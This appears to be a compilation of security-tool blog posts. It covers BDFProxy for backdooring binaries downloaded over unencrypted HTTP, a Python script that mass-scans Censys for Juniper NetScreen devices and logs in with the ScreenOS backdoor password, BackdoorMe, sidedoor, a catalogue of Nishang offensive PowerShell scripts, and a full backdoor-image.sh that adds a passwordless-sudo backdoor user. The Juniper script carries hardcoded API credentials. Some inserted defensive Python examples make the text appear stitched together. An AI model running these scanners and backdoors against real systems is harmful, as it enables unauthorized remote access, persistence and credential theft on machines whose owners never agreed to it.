This script rides on two libraries for usage: The Backdoor Factory (BDF) and the mitmProxy.
Concept:
Patch binaries during download ala MITM.
Why:
Because a lot of security tool websites still serve binaries via non-SSL/TLS means.
Here’s a short list:

sysinternals.com
Microsoft - MS Security Essentials
Almost all anti-virus companies
Malwarebytes
Sourceforge
gpg4win
Wireshark
etc...

+ Supported Environment:

Tested on all Kali Linux builds, whether a physical beefy laptop, a Raspberry Pi, or a VM, each can run BDFProxy.

Install:
BDF is in bdf/
Run the following to pull down the most recent:

./install.sh

OR:

git clone https://github.com/secretsquirrel/the-backdoor-factory bdf/
If you get a certificate error, run the following:

mitmproxy
and exit with [Ctrl+C] after mitmProxy loads.

Usage:

Update everything before each use:

./update.sh

 READ THE CONFIG!!!

-->bdfproxy.cfg

You will need to configure your C2 host and port settings before running BDFProxy. DO NOT overlap C2 PORT settings between different payloads. You’ll be sending linux shells to windows machines and things will be segfaulting all over the place. After running, there will be a metasploit resource script created to help with setting up your C2 communications. Check it carefully. By the way, everything outside the [Overall] section updates on the fly, so you don’t have to kill your proxy to change settings to work with your environment.

But wait! You will need to configure your mitm machine for mitm-ing! If you are using a wifiPineapple, I modded a script put out by Hak5 to help you with configuration. Run ./wpBDF.sh and enter the correct configs for your environment. This script configures iptables to push only http (non-ssl) traffic through the proxy. All other traffic is forwarded normally.

Then:

./bdf_proxy.py

Here’s some sweet ascii art for possible physical settings of the proxy:
Lan usage:

<Internet>----<mitmMachine>----<userLan>

WIFI Usage :

<Internet>----<mitmMachine>----<wifiPineapple>))

Testing:

Suppose you want to use your browser with Firefox and FoxyProxy to connect to test your setup.

    Update your config as follows:
    transparentProxy = False

    Configure FoxyProxy to use BDFProxy as a proxy.
    Default port in the config is 8080.

+ Logging:

We have it. The proxy window will quickly fill with massive amounts of cat links depending on the client you are testing. Use tail -f proxy.log to see what is getting patched and blocked by your blacklist settings. However, keep an eye on the main proxy window if you have chosen to patch binaries manually; things move fast and behind the scenes traffic is multi-threaded, but the initial requests and responses are locking for your viewing pleasure.

+ Attack Scenarios (all with permission of targets):
-Evil Wifi AP
-Arp Redirection
-Physical plant in a wiring closet
-Logical plant at your favorite ISP
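The risk the Concept and Why sections describe, a binary patched while it crosses an unencrypted link, is caught on the receiving side by pinning hashes and by refusing non-TLS downloads. The Python below is an added example written for this post, not code from BDFProxy or BDF. The pin list, the URLs and the minimal PE images it builds are constructed for offline use, and the PE offsets follow the standard PE/COFF header layout (security data directory at index 4).

```python
"""Check a downloaded Windows binary before trusting it (added example, not
part of the BDFProxy project). Assumptions: the pin list is maintained by the
defender and published over a trusted channel; PE parsing follows the PE/COFF
layout; the sample images built below are constructed."""
import hashlib
import struct
from urllib.parse import urlparse

IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # index of the Authenticode data directory


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def pe_has_authenticode(data):
    """True if the security data directory is populated, False if it is empty,
    None if the bytes do not parse as a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 26 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    opt = e_lfanew + 24                      # optional header follows the 20-byte COFF header
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic == 0x10B:                       # PE32
        nrva_off, dir_off = opt + 92, opt + 96
    elif magic == 0x20B:                     # PE32+
        nrva_off, dir_off = opt + 108, opt + 112
    else:
        return None
    sec_off = dir_off + IMAGE_DIRECTORY_ENTRY_SECURITY * 8
    if sec_off + 8 > len(data):
        return None
    (nrva,) = struct.unpack_from("<I", data, nrva_off)
    if nrva <= IMAGE_DIRECTORY_ENTRY_SECURITY:  # directory table too short to hold it
        return False
    va, size = struct.unpack_from("<II", data, sec_off)
    return va != 0 and size != 0


def check_download(url, data, pins):
    """Return a list of findings; an empty list means the file passed every check."""
    findings = []
    parsed = urlparse(url)
    if parsed.scheme.lower() != "https":
        findings.append("transport: %s is not HTTPS, content can be patched in transit" % url)
    name = parsed.path.rsplit("/", 1)[-1]
    expected = pins.get(name)
    if expected is None:
        findings.append("pin: no pinned SHA-256 for %s" % name)
    elif sha256_hex(data) != expected.lower():
        findings.append("pin: SHA-256 mismatch for %s" % name)
    signed = pe_has_authenticode(data)
    if signed is None:
        findings.append("pe: not a parseable PE image")
    elif not signed:
        findings.append("pe: no Authenticode signature directory")
    return findings


def build_sample_pe(signed):
    """Constructed minimal PE32 image (headers only) for offline demonstration."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    # COFF header: i386, 0 sections, timestamp, symtab, nsyms, SizeOfOptionalHeader, flags
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)                     # PE32 optional header with 16 directories
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 92, 16)      # NumberOfRvaAndSizes
    if signed:
        # Point the security directory at a hypothetical certificate table.
        struct.pack_into("<II", opt, 96 + IMAGE_DIRECTORY_ENTRY_SECURITY * 8, 0x400, 0x200)
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    pins = {"tool.exe": sha256_hex(build_sample_pe(True))}   # constructed pin
    for url, blob in (("https://example.invalid/dl/tool.exe", build_sample_pe(True)),
                      ("http://example.invalid/dl/tool.exe", build_sample_pe(False))):
        print(url, check_download(url, blob, pins) or ["ok"])
```

The Authenticode check only reports whether a signature directory is present. With the CODE_SIGN option added in v0.3.8 a patched binary can carry a signature of its own, so the pinned hash and the HTTPS requirement are the checks that actually decide, and any signature present should still be validated against the expected publisher with platform tooling.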

Download : 0.3.8.zip | 0.3.8.tar.gz | Our Post Before | Source : https://github.com/secretsquirrel

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @midnite_runr

Juniper Backdoor – search possible backdoor host and bulk verified.

Background:
Censys is a search engine for information about Internet-connected devices. Security teams can use it to assess their own exposure, while attackers can use it for preliminary reconnaissance and for collecting information about targets. It is very similar to the popular Shodan, but its advantage over Shodan is that it is free; it was launched by researchers at the University of Michigan in October and is currently supported by Google. Juniper’s senior vice president and Chief Information Security Officer, Bob Worrall, said that two vulnerabilities were discovered during a recent internal code audit. They affect ScreenOS versions 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20. One is unauthorized code that can decrypt VPN traffic; the other could allow an attacker to gain remote administrative access to the device through SSH or telnet.
Juniper noted that access through this backdoor is logged as a successful password authentication, but an attacker can alter or delete the log entry.
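Triage of ScreenOS versions against the affected ranges stated above, as an added example that is not part of the original post or of the script below. Because the post says a backdoor login is recorded as an ordinary successful password authentication, the firmware version is the dependable indicator for a defender. Version strings are assumed to follow the 6.3.0r12 form with an optional trailing build number such as 6.3.0r12.0; that suffix handling and the inventory hostnames are assumptions.

```python
"""Triage ScreenOS versions against the affected ranges named in the post above.
Added example, not part of the original post; version strings are assumed to
look like '6.3.0r12' with an optional trailing build number such as '6.3.0r12.0'."""
import re

# Inclusive affected ranges stated in the post, as (major, minor, patch, release).
AFFECTED_RANGES = (
    ((6, 2, 0, 15), (6, 2, 0, 18)),
    ((6, 3, 0, 12), (6, 3, 0, 20)),
)

VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)\.(\d+)r(\d+)(?:\.\d+)?\s*$")


def parse_screenos_version(text):
    """'6.3.0r12.0' -> (6, 3, 0, 12); None when the string is not a ScreenOS version."""
    m = VERSION_RE.match(text)
    return tuple(int(x) for x in m.groups()) if m else None


def is_affected(version):
    """True/False for a parseable version, None when it cannot be parsed."""
    parsed = parse_screenos_version(version)
    if parsed is None:
        return None
    # Tuple comparison is lexicographic, so each range check is inclusive on both ends.
    return any(lo <= parsed <= hi for lo, hi in AFFECTED_RANGES)


def triage(inventory):
    """inventory: iterable of (hostname, version) -> list of (hostname, version, status)."""
    rows = []
    for host, version in inventory:
        verdict = is_affected(version)
        status = "unknown-version" if verdict is None else ("affected" if verdict else "not-affected")
        rows.append((host, version, status))
    return rows


# Constructed inventory; hostnames and versions are sample data, not real devices.
SAMPLE_INVENTORY = [
    ("fw-branch-01", "6.3.0r12.0"),
    ("fw-branch-02", "6.3.0r21.0"),
    ("fw-dc-01", "6.2.0r18"),
    ("fw-dc-02", "6.2.0r14"),
    ("fw-lab", "unknown"),
]

if __name__ == "__main__":
    for host, version, status in triage(SAMPLE_INVENTORY):
        print("%-14s %-12s %s" % (host, version, status))
```

Devices reported as unknown-version need a manual check rather than being treated as clean, and devices in the affected ranges should have successful administrative logins from unexpected sources reviewed, since the post notes the entries can be edited after the fact.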

JuniperBackdoor.py Script:

from pexpect import pxssh
from Queue import Queue
import threading
import time
import re
import sys
import json
import requests
import math

user = "root"
passwd = "<<< %s(un='%s') = %u"

API_URL = "https://www.censys.io/api/v1"
UID = "373ab943-2e4b-4088-b1ac-396c0c21ce2c"
SECRET = "sRwAT71mrRJnyZBD95sjEjkFLXRjP5n6"

PAGES = 50
cur_page = 1
thread_num = 20

queue = Queue()

class testTarget(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)

    def run(self):
        global queue
        while True:
            for i in range(5):
                if not queue.empty():
                    ip = queue.get()
                else:
                    break
                theSSH = connectSSH(ip, user, passwd)
                if theSSH:
                    before = theSSH.before
                    try:
                        theSSH.logout()
                    except:
                        pass
                    isval = re.search('Remote Management Console', before)
                    if isval:
                        print "%s is vul" % ip
                        ip_OK.write("%s\n" % ip)
                        ip_OK.flush()
                    else:
                        print "%s is not vul" %ip
            time.sleep(1)

def connectSSH(host, user, passwd):
    try:
        ssh = pxssh.pxssh()
        ssh.login(host, user, passwd, auto_prompt_reset = False)
        return ssh
    except Exception, e:
        print "%s is not vul" % host

def getIp(page):
    start_time = time.time()
    data = {
        "query":"22.ssh.banner.software_version:NetScreen location.country:China", 
        "page":page, 
        "fields":["ip"]
    }
    try:
        res = requests.post(API_URL + "/search/ipv4", data=json.dumps(data), auth=(UID, SECRET))
    except:
        pass
    else:
        try:
            results = res.json()
        except:
            pass
        else:
            if res.status_code != 200:
                print "error occurred: %s" % results["error"]
                sys.exit(1)
            else:
                result_iter = iter(results["results"])
                for result in result_iter:
                    queue.put(result["ip"])

def test():
    for i in range(thread_num):
        t = testTarget()
        t.start()

if __name__ == '__main__':
    ip_OK = open("ip_OK.txt", "w")
    getIp(cur_page)
    test()
    while queue.qsize() > 0:
        if cur_page <= PAGES:
            getIp(cur_page)
            cur_page += 1
        time.sleep(0.1)
    ip_OK.close()

Source : https://github.com/s0m30ne

Updates BackdoorMe – a powerful auto-backdooring utility.

Latest Change 23/12/2015:
+ fixed travis version.
+ added poison module.
+ Fixed Bash and added a second bash backdoor.
+ removed offending tests.

Backdoorme is a simple utility that logs into a Linux machine and gives the user the option to install a slew of backdoors.

BackdoorMe a powerful auto-backdooring utility. This Backdoor has Been Tested on Kali Linux 2.0 and Ubuntu 14.04

Currently enabled backdoors include:
+ Bash
+ Netcat
+ Netcat-traditional
+ Metasploit
+ Perl
+ Pupy
– Python: Please run the dependencies python script to install the necessary dependencies. Backdoorme requires python 2.7 or higher.

Installation:

git clone https://github.com/Kkevsterrr/backdoorme <Your Clone Folder Name>
cd <your Folder>
python dependencies.py
python master.py


Update:
cd backdoorme
git pull

Source: https://github.com/Kkevsterrr | Our post Before

sidedoor is a Backdoor using a reverse SSH tunnel.

sidedoor is a Backdoor using a reverse SSH tunnel on Debian/Ubuntu systems.
sidedoor maintains a reverse SSH tunnel to provide a backdoor. sidedoor can be used to remotely control a device behind a NAT. The sidedoor user has full root access configured in /etc/sudoers.d.

Howto:
1. Install sidedoor. For now, sudo dpkg -i sidedoor*.deb. You can build a package by running dpkg-buildpackage -us -uc -b.
2. Optionally, lock down the local SSH server by disabling password authentication (ChallengeResponseAuthentication no and PasswordAuthentication no) and listening only on localhost (ListenAddress ::1 and ListenAddress 127.0.0.1) in /etc/ssh/sshd_config. Then restart or reload sshd, e.g., sudo service ssh reload.
3. Configure REMOTE_SERVER and TUNNEL_PORT in /etc/default/sidedoor.
4. Install an SSH private key to access the remote server in /var/lib/sidedoor/.ssh/id_rsa. The corresponding public key will need to be included in the remote user’s ~/.ssh/authorized_keys file.
5. Install SSH public key(s) to control access to the local sidedoor user in /var/lib/sidedoor/.ssh/authorized_keys.
6. Restart sidedoor service, e.g., sudo service sidedoor restart.
7. Optionally, modify ssh_config_example and include it in a client’s ~/.ssh/config file to easily access the tunnelled backdoor.

Usage:

git clone https://github.com/daradib/sidedoor
cd sidedoor
./sidedoor

Source: https://github.com/daradib

Nishang v-0.6.2 – PowerShell for penetration testing and offensive security.

Changelog v0.6.2:
+ Added support for dumping cleartext credentials from RDP sessions for Invoke-MimikatzWdigestDowngrade.
– Fixed issue #29.

DESCRIPTION
This script uses MJPEG to stream a target’s desktop in real time. It is able to connect to a standard netcat listener on a port when the -Reverse switch is used. A standard netcat can also connect to this script when it is bound to a specific port.
A netcat listener which relays the connection to a local port could be used as the listener. A browser which supports MJPEG (Firefox) should then be pointed at the local port to see the remote desktop.

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.

Scripts: Nishang currently contains the following scripts and payloads.
+ Antak – the Webshell
– Antak : Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.

+ Backdoors
– HTTP-Backdoor : A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
– DNS_TXT_Pwnage : A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
– Execute-OnTime : A backdoor which can execute PowerShell scripts at a given time on a target.
– Gupt-Backdoor : A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
– Add-ScrnSaveBackdoor : A backdoor which can use Windows screen saver for remote command and script execution.
– Invoke-ADSBackdoor : A backdoor which can use alternate data streams and Windows Registry to achieve persistence.

+ Client
– Out-CHM : Create infected CHM files which can execute PowerShell commands and scripts.
– Out-Word : Create Word files and infect existing ones to run PowerShell commands and scripts.
– Out-Excel : Create Excel files and infect existing ones to run PowerShell commands and scripts.
– Out-HTA : Create a HTA file which can be deployed on a web server and used in phishing campaigns.
– Out-Java : Create signed JAR files which can be used with applets for script and command execution.
– Out-Shortcut : Create shortcut files capable of executing commands and scripts.
– Out-WebQuery : Create IQY files for phishing credentials and SMB hashes.

+ Escalation
– Enable-DuplicateToken : When SYSTEM privileges are required.
– Remove-Update : Introduce vulnerabilities by removing patches.

+ Execution
– Download-Execute-PS : Download and execute a PowerShell script in memory.
– Download_Execute : Download an executable in text format, convert it to an executable, and execute.
– Execute-Command-MSSQL : Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
– Execute-DNSTXT-Code : Execute shellcode in memory using DNS TXT queries.

+ Gather
– Check-VM : Check for a virtual machine.
– Copy-VSS : Copy the SAM file using Volume Shadow Copy Service.
– Invoke-CredentialsPhish : Trick a user into giving credentials in plain text.
– FireBuster FireListener: A pair of scripts for egress testing
– Get-Information : Get juicy information from a target.
– Get-LSASecret : Get LSA Secret from a target.
– Get-PassHashes : Get password hashes from a target.
– Get-WLAN-Keys: Get WLAN keys in plain text from a target.

+ Keylogger
Log keystrokes from a target.
– Invoke-MimikatzWdigestDowngrade: Dump user passwords in plain on Windows 8.1 and Server 2012
– Get-PassHints : Get password hints of Windows users from a target.

+ Pivot
– Create-MultipleSessions : Check credentials on multiple computers and create PSSessions.
– Run-EXEonRemote : Copy and execute an executable on multiple machines.
– Invoke-NetworkRelay : Create network relays between computers.

+ Prasadhak
– Prasadhak : Check running hashes of running process against the VirusTotal database.

+ Scan
– Brute-Force : Brute force FTP, Active Directory, MSSQL, and Sharepoint.
– Port-Scan : A handy port scanner

+ Powerpreter
Powerpreter : All the functionality of nishang in a single script module.

+ Shells :
– Invoke-PsGcat: Send commands and scripts to a specified Gmail account to be executed by Invoke-PsGcatAgent
– Invoke-PsGcatAgent: Execute commands and scripts sent by Invoke-PsGcat.
– Invoke-PowerShellTcp: An interactive PowerShell reverse connect or bind shell
– Invoke-PowerShellTcpOneLine : Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.
– Invoke-PowerShellUdp : An interactive PowerShell reverse connect or bind shell over UDP
– Invoke-PowerShellUdpOneLine : Stripped down version of Invoke-PowerShellUdp.
– Invoke-PoshRatHttps : Reverse interactive PowerShell over HTTPS.
– Invoke-PoshRatHttp : Reverse interactive PowerShell over HTTP.
– Remove-PoshRat : Clean the system after using Invoke-PoshRatHttps
– Invoke-PowerShellWmi : Interactive PowerShell using WMI.
– Invoke-PowerShellIcmp : An interactive PowerShell reverse shell over ICMP.

+ Utility:
– Add-Exfiltration: Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
– Add-Persistence: Add reboot persistence capability to a script.
– Remove-Persistence: Remove persistence added by the Add-Persistence script.
– Do-Exfiltration: Pipe (|) this to any script to exfiltrate the output.
– Download: Transfer a file to the target.
– Parse_Keys : Parse keys logged by the keylogger.
– Invoke-Encode : Encode and compress a script or string.
– Invoke-Decode : Decode and decompress a script or string from Invoke-Encode.
– Start-CaptureServer : Run a web server which logs Basic authentication and SMB hashes.
— [Base64ToString] [StringToBase64] [ExetoText] [TexttoExe]

Download : Nishang.zip(951 KB) | Our Post Before
Source : http://www.labofapenetrationtester.com/

backdoor-image is a ‘backdoor’ user to a image or filesystem at ‘target’.

NOTICE : This post and script for research Purpose Only!
backdoor-image is a ‘backdoor’ user to a image or filesystem at ‘target’.
File lists:
+ backdoor-image.sh add a ‘backdoor’ user to a image or filesystem at ‘target’

+ mount-callback-umount : mount a file to a temporary mount point and then invoke the provided cmd with args; the temporary mountpoint will be put in an environment variable named MOUNTPOINT

Usage:

git clone https://github.com/Crazykev/backdoor-image && cd backdoor-image
chmod +x backdoor-image.sh
chmod +x mount-callback-umount

backdoor-image.sh Script:

#!/bin/bash

VERBOSITY=0
TEMP_D=""
DEFAULT_USER="backdoor"

error() { echo "$@" 1>&2; }

Usage() {
	cat <<EOF
Usage: ${0##*/} [ options ] target
   add a 'backdoor' user to a image or filesystem at 'target'
   options:
      --import-id U      use 'ssh-import-id' to get ssh public keys
                         may be used more than once.
      --force            required to operate on / filesystem
      --password P       set password P, implies --password-auth
      --password-auth    enable password auth
      --pubkeys  F       add public keys from file 'F'
                         default: ~/.ssh/id_rsa.pub unless --password
                         or --import-id specified
      --user      U      use user 'U' (default: '${DEFAULT_USER}')
EOF
}

bad_Usage() { Usage 1>&2; [ $# -eq 0 ] || error "$@"; exit 1; }
cleanup() {
	[ -z "${TEMP_D}" -o ! -d "${TEMP_D}" ] || rm -Rf "${TEMP_D}"
}

debug() {
	local level=${1}; shift;
	[ "${level}" -gt "${VERBOSITY}" ] && return
	error "${@}"
}

mod_sshd_bool() {
	local cfg="$1" kn="$2" target="$3" dry=${4:-false}
	local ws=$' \t' msg=""
	local match="^\([#]\{0,1\}\)[#$ws]*$kn\([$ws]\+\)\(yes\|no\)"
	local cur="" hsh="#"
	cur=$(sed -n "s/$match/\1\3/p" "$cfg") ||
		{ error "failed to read $cfg"; return 1; }
	if [ -n "$cur" ]; then
		case "$cur" in
			"#$target") msg="uncommenting, '$target' line";;
			"#"*) msg="uncommenting, changing '${cur#$hsh}' to '$target'";;
			"$target") msg="nochange";;
			*) msg="changing '$cur' to '$target'";;
		esac
		if [ "$msg" = "nochange" ]; then
			debug 1 "no change to $cfg necessary"
		else
			debug 1 "updating $cfg: $msg"
			$dry && return
			sed -i "s/$match/$kn\2${target}/" "$cfg" ||
				{ error "failed to update $cfg"; return 1; }
		fi
	else
		debug 1 "appending entry for '$kn $target' to $cfg"
		$dry && return
		echo "$kn $target" >> "$cfg" ||
			{ error "failed to append entry to $cfg"; return 1; }
	fi
	return 0
}

test_mod_sshd_cfg() {
	local kn="PasswordAuthentication"
	echo "#$kn   yes" > f1
	echo "#$kn  no" > f2
	echo "$kn yes" > f3
	echo "$kn no" > f4
	: > f5
	for f in f1 f2 f3 f4 f5; do
		mod_sshd_bool "$f" PasswordAuthentication yes true
	done
}

add_group_ent() {
	local group="$1" gid="$2" fgroup="$3" dry="${4:-false}"
	local grent="$group:x:$gid:"
	if grep -q "^$group:" "$fgroup"; then
		debug 1 "remove $group from group file"
		$dry || sed -i "/^$group:/d" "$fgroup" ||
			{ error "failed to remove user from group"; return 1; }
	fi

	debug 1 "append entry to group: $grent"
	if ! $dry; then
		echo "$grent" >> "$fgroup" ||
			{ error "failed to update group file"; return 1; }
	fi
	return 0
}

add_passwd_ent() {
	local user="$1" uid="$2" gid="$3" home="$4" fpasswd="$5" dry=${6:-false}

	if grep -q "^$user:" "$fpasswd"; then
		debug 1 "remove $user from password file"
		$dry || sed -i "/^$user:/d" "$fpasswd" ||
			{ error "failed to remove user from password file"; return 1; }
	fi

	local pwent="$user:x:$uid:$gid:backdoor:$home:/bin/bash"
	debug 1 "append entry to passwd: $pwent"
	if ! $dry; then
		echo "$pwent" >> "$fpasswd" ||
			{ error "failed to update passwd file"; return 1; }
	fi
}

encrypt_pass() {
	local pass="$1" fmt="${2-\$6\$}"
	enc=$(echo "$pass" |
		perl -e '
			$p=<STDIN>; chomp($p);
			$salt = join "", map { (q(a)..q(z))[rand(26)] } 1 .. 8;
			if (${ARGV[0]}) { $salt = "${ARGV[0]}$salt\$"; }
			print crypt($p, "$salt") . "\n";' "$fmt") || return
	[ -n "${enc}" ] && [ -z "${fmt}" -o "${enc#${fmt}}" != "${fmt}" ] &&
	_RET="$enc"
}

add_shadow_ent() {
	local user="$1" pass="$2" fshadow="$3" dry="$4"
	local encrypt_pre="\$6\$" shent="" encpass="" pwchange=""

	# if input was '$6$' format, just use it verbatum
	if [ "${pass#${encrypt_pre}}" != "${pass}" ]; then
		debug 1 "using encrypted password from cmdline"
		encpass="$pass"
	else
		encrypt_pass "$pass" && encpass="$_RET" ||
			{ error "failed to encrypt password"; return 1; }
	fi

	# pwchange is number of days since 1970
	pwchange=$(($(date +"(%Y-1970)*365 + 10#%j")))
	shent="$user:$encpass:$pwchange:0:99999:7:::"

	if grep -q "^$user:" "$fshadow"; then
		debug 1 "remove $user from shadow file"
		$dry || sed -i "/^$user:/d" "$fshadow" ||
			{ error "failed to remove user from shadow"; return 1; }
	fi

	debug 1 "append entry to shadow: $shent"
	if ! $dry; then
		echo "$shent" >> "$fshadow" ||
			{ error "failed to update shadow file"; return 1; }
	fi
	return 0

}

add_sudo_ent() {
	local user="$1" mp="$2" dry="$3"

	local target="/etc/sudoers.d/99-$user"

	local ent="$user ALL=(ALL) NOPASSWD:ALL"
	local start="#BACKDOOR_START_${user}"
	local end="#BACKDOOR_end_${user}"
	local content=$(printf "%s\n%s\n%s\n" "$start" "$ent" "$end")

	if [ -f "$mp/etc/lsb-release" ] &&
		grep -i lucid -q "$mp/etc/lsb-release"; then
		target="/etc/sudoers"
		debug 2 "$mp does not seem to support sudoers.d"
		debug 1 "add sudoers ($mp,$target): $ent"
		if grep -q "^$start$" "$mp/$target"; then
			debug 2 "removing $user entry from $target"
			if ! $dry; then
				sed -i "/^${start}$/,/^${end}$/d" "$target" ||
					{ error "failed update $target"; return 1; }
			fi
		fi
		if ! $dry; then
			( umask 226 && echo "$content" >> "$mp/$target" ) ||
				{ error "failed to add sudoers entry to $target"; return 1; }
		fi
	else
		debug 1 "add sudoers ($mp,$target): $ent"
		if ! $dry; then
			rm -f "$mp/$target" &&
				( umask 226 && echo "$content" > "$mp/$target" ) ||
				{ error "failed to add sudoers entry to $target"; return 1; }
		fi
	fi
}

add_user() {
	local user="$1" pass="$2" uid="$3" gid="$4" home="$5"
	local rootd="$6" dry="${7:-false}"
	local fpasswd="$rootd/etc/passwd" fshadow="$rootd/etc/shadow"
	local fgroup="$rootd/etc/group"

	[ -f "$fpasswd" ] || { error "no password file"; return 1; }
	[ -f "$fshadow" ] || { error "no shadow file"; return 1; }
	[ -f "$fgroup" ] || { error "no group file"; return 1; }

	local group="$user" f="" t=""
	
	add_passwd_ent "$user" "$uid" "$gid" "$home" "$fpasswd" "$dry" || return 1
	add_group_ent "$group" "$gid" "$fgroup" "$dry" || return 1
	add_shadow_ent "$user" "$pass" "$fshadow" "$dry" || return 1

	debug 1 "create $rootd/home/$user"
	if ! $dry; then
		mkdir -p "$rootd/home/$user" &&
			chown $uid:$gid "$rootd/home/$user" ||
			{ error "failed to make home dir"; return 1; }
		for f in "$rootd/etc/skel/".* "$rootd/etc/skel/"*; do
			[ -e "$f" ] || continue
			t="$rootd/home/$user/${f##*/}"
			[ ! -e "$t" ] || continue
			cp -a "$f" "$t" && chown -R "$uid:$gid" "$t" ||
				{ error "failed to copy $f to $t"; return 1; }
		done
	fi
}

add_user_keys() {
	local keys="$1" dir="$2" ownership="$3" dry="${4:-false}"
	debug 1 "add ssh keys to $dir with $ownership"
	$dry && return
	mkdir -p "$dir" &&
		cp "$keys" "$dir/authorized_keys" &&
		chmod 600 "$dir/authorized_keys" &&
		chown "$ownership" "$dir" "$dir/authorized_keys" &&
		chmod 700 "$dir" ||
		{ error "failed to add user keys"; return 1; }
	if [ $VERBOSITY -ge 1 ]; then
		debug 1 "added ssh keys:"
		sed "s,^,| ," "$keys"
	fi
}

gen_ssh_keys() {
	local mp="$1" types="${2:-rsa}" dry="${3:-false}"
	local ktype="" file="" ftmpl="/etc/ssh/ssh_host_%s_key" out=""
	for ktype in $types; do
		file=${ftmpl//%s/$ktype}
		if [ -f "$mp/$file" ]; then
			debug 2 "existing key for $mp/$file"
			continue
		fi
		debug 1 "ssh-keygen -t $ktype -N '' -f '$file' -C backdoor"
		$dry && continue
		out=$(ssh-keygen -t "$ktype" -N '' -f "$mp/$file" -C backdoor 2>&1) || {
			error "$out"
			error "failed generate keytype $ktype";
			return 1;
		}
		out=$(ssh-keygen -l -f "$mp/$file")
		debug 1 "$out"
	done
}

apply_changes() {
	local mp="$1" user="$2" password="$3" pwauth="$4" pubkeys="$5"
	local dry="${6:-false}"
	local home="/home/$user" key=""
	local uid="9999" gid="9999"

	local sshcfg="$mp/etc/ssh/sshd_config"
	[ -f "$sshcfg" ] ||
		{ error "$sshcfg does not exist"; return 1; }

	key="PubkeyAuthentication"
	mod_sshd_bool "$sshcfg" "$key" "yes" "$dry" ||
		{ error "failed to set $key to yes"; return 1; }

	if $pwauth; then
		key="PasswordAuthentication"
		mod_sshd_bool "$sshcfg" "$key" "yes" "$dry" ||
			{ error "failed to set $key to yes"; return 1; }
	fi

	gen_ssh_keys "$mp" "rsa" "$dry" || return 1

	add_user "$user" "$password" "$uid" "$gid" "$home" "$mp" "$dry" || return 1

	[ -z "$pubkeys" ] ||
		add_user_keys "$pubkeys" "$mp/$home/.ssh" "$uid:$gid" "$dry" || return 1

	add_sudo_ent "$user" "$mp" "$dry" || return 1

}

main() {
	short_opts="hv"
	long_opts="help,dry-run,force,import-id:,password:,password-auth,pubkeys:,user:,verbose"
	getopt_out=$(getopt --name "${0##*/}" \
		--options "${short_opts}" --long "${long_opts}" -- "$@") &&
		eval set -- "${getopt_out}" ||
		bad_Usage

	local user="" password="" pwauth=false pubkeys="" import_ids="" dry=false
	local target="" pkfile="" force=false
	user="${DEFAULT_USER}"

	local args=""
	args=( "$@" )
	unset args[${#args[@]}-1]

	while [ $# -ne 0 ]; do
		cur=${1}; next=${2};
		case "$cur" in
			-h|--help) Usage ; exit 0;;
			   --dry-run) dry=true;;
			   --force) force=true;;
			   --import-id)
					import_ids="${import_ids:+${import_ids} }$next";
					shift;;
			   --password) password=$next; shift;;
			   --password-auth) pwauth=true;;
			   --pubkeys) pubkeys=$next; shift;;
			   --user) user=$next; shift;;
			-v|--verbose) VERBOSITY=$((${VERBOSITY}+1));;
			--) shift; break;;
		esac
		shift;
	done

	[ $# -ne 0 ] || { bad_Usage "must provide image"; return 1; }
	[ $# -ge 2 ] && { bad_Usage "too many arguments: $*"; return 1; }

	[ "$(id -u)" = "0" ] || 
		{ error "sorry, must be root"; return 1; }

	target="$1"
	if [ -d "$target" ]; then
		if [ "$target" -ef "/" ] && ! $force; then
			error "you must specify --force to operate on /"
			return 1
		fi
	elif [ -f "$target" ]; then
		local vopt="" mcu="mount-callback-umount"
		if [ ${VERBOSITY} -ge 2 ]; then
			vopt="-v"
		fi
		if ! command -v "$mcu" >/dev/null 2>&1; then
			if [ -x "${0%/*}/$mcu" ]; then
				PATH="${0%/*}:$PATH"
			elif command -v "mount-image-callback" >/dev/null 2>&1; then
				mcu="mount-image-callback"
			else
				error "No '$mcu' or 'mount-image-callback' in PATH"
				return 1
			fi
		fi
		exec "$mcu" $vopt -- "$target" "$0" "${args[@]}" _MOUNTPOINT_
	else
		[ -f "$target" ] || { error "$target: not a file"; return 1; }
	fi

	# --password implies --password-auth (see Usage); perl is needed to hash it
	if [ -n "$password" ]; then
		which perl >/dev/null 2>&1 ||
			{ error "perl required for making password"; return 1; }
		pwauth=true
	fi

	{ [ -z "$import_ids" ] || which ssh-import-id >/dev/null 2>&1; } ||
		{ error "you do not have ssh-import-id"; return 1; }

	TEMP_D=$(mktemp -d "${TMPDIR:-/tmp}/${0##*/}.XXXXXX") ||
		{ error "failed to make tempdir"; return 1; }
	trap cleanup EXIT

	pkfile="${TEMP_D}/pubkeys"
	if [ -z "$password" -a -z "$pubkeys" -a -z "$import_ids" ]; then
		[ -f ~/.ssh/id_rsa.pub ] || {
			error "must specify one of --password, --pubkeys, --import-id"
			error "either pass an argument or create ~/.ssh/id_rsa.pub"
			return 1
		}
		debug 1 "set pubkeys to ~/.ssh/id_rsa.pub"
